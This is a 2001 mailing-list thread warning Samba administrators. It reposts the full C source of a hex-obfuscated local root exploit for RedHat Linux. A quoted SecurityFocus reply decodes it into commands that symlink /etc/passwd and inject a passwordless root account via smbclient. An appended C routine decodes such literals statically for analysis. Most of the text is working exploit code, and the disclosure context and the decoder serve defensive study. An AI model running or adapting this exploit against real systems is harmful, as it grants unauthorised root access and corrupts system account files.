update for samba server exploit -> Re: samba server exploit
- To: <tlug@example.com>
- Subject: update for samba server exploit -> Re: samba server exploit
- From: "roy lo" <roylo@example.com>
- Date: Thu, 25 Oct 2001 20:56:29 -0700
update for samba server exploit
"Hey,
There is some confusion about the Samba exploit. It is an obfuscated
exploit for an old vulnerability in the Samba daemon. Before approving it
to the list, I checked it.
The system() calls:
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);
Try this:
printf("%s\n%s\n%s\n",inject1,inject2,inject3a);
output:
/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"
fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N
I am not sure why they chose to write the exploit this way.
Regards,
Dave Ahmad
SecurityFocus
www.securityfocus.com"
----- Original Message -----
From: roy lo
To: tlug@example.com
Sent: Thursday, October 25, 2001 5:01 PM
Subject: samba server exploit
saw this on bugtraq today, I know some of you run samba servers, so hopefully this will help you to identify the problem in the event of an attack.
/*
* Samba Server r00t exploit
*
* Scope: Local (this exploit) and possible remote if conditions are given.
* Vuln:
* RedHat 5.1
* RedHat 5.2
* RedHat 6.0
* RedHat 6.1
* RedHat 6.2
* RedHat 7.0
* RedHat 7.1
* I don't know if other versions are vulnerable too.
*
* Run this exploit and then take a look at your passwd file.
* Run: ./samba-exp user
*
* Author: Gabriel Maggiotti
* Email: gmaggiot@example.com
* Webpage: http://qb0x.net
*/
#include <stdio.h>
#include <string.h>
int main(int argc,char *argv[])
{
    char inject1[]=
        "\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
        "\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
    char inject2[]=
        "\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
        "\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
        "\x70\x2f\x78\x2e\x6c\x6f\x67";
    char inject3a[100]=
        "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
        "\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
        "\x68\x6f\x73\x74\x2f\x22\xa\xa";
    char inject3b[]=
        "\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
        "\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
        "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
        "\x4e\xa";
    if(argc!=2){
        fprintf(stderr,"usage: %s <user>\n",*argv);
        return 1;
    }
    strcat(inject3a,argv[1]);
    strcat(inject3a,inject3b);
    system(inject1, 0);
    system(inject2, 0);
    system(inject3a, 0);
    return 0;
}
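The printf check described in the quoted analysis can also be done statically. The following is an added example, not code from the thread or from its authors: it decodes hex-escaped C string literals from source text, so the embedded commands can be read without compiling or running the posted file. The names decode_c_literals and SAMPLE are assumptions for illustration, and the decoder expects initializer text only (it does not skip comments or character literals).

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Decode the C string literals in `src` (adjacent literals concatenated, as
 * the compiler would) into `out`, without compiling or running the code.
 * Handles \xHH, \n, \t, \\ and \". Returns the length, or -1 if `out` is full. */
long decode_c_literals(const char *src, char *out, size_t outlen)
{
    size_t n = 0;
    int in_str = 0;
    if (outlen == 0) return -1;
    for (const char *p = src; *p; p++) {
        unsigned c = (unsigned char)*p;
        if (!in_str) {                    /* outside quotes: skip code text */
            in_str = (c == '"');
            continue;
        }
        if (c == '"') { in_str = 0; continue; }
        if (c == '\\' && p[1]) {
            p++;
            if (*p == 'x') {              /* \x consumes every hex digit after it */
                for (c = 0; isxdigit((unsigned char)p[1]); p++)
                    c = c * 16 + (isdigit((unsigned char)p[1])
                        ? p[1] - '0' : tolower((unsigned char)p[1]) - 'a' + 10);
            } else if (*p == 'n') c = '\n';
            else if (*p == 't') c = '\t';
            else c = (unsigned char)*p;   /* \\ and \" stand for themselves */
        }
        if (n + 1 >= outlen) return -1;
        out[n++] = (char)c;               /* decoded bytes are never re-scanned */
    }
    out[n] = '\0';
    return (long)n;
}

/* inject1's initializer from the posted source, kept as inert text. */
static const char SAMPLE[] =
    "char inject1[]=\n"
    "\"\\x2f\\x62\\x69\\x6e\\x2f\\x72\\x6d\\x20\\x2d\\x72\\x66\\x20\\x2f\"\n"
    "\"\\x74\\x6d\\x70\\x2f\\x78\\x2e\\x6c\\x6f\\x67\";\n";

int main(void)
{
    char buf[256];
    if (decode_c_literals(SAMPLE, buf, sizeof buf) < 0) return 1;
    printf("%s\n", buf);
    return 0;
}
```

Because a decoded `\x22` or `\x5c` is written straight to the output and not re-scanned, the quote and backslash bytes hidden in inject3a and inject3b come out as data instead of ending the literal.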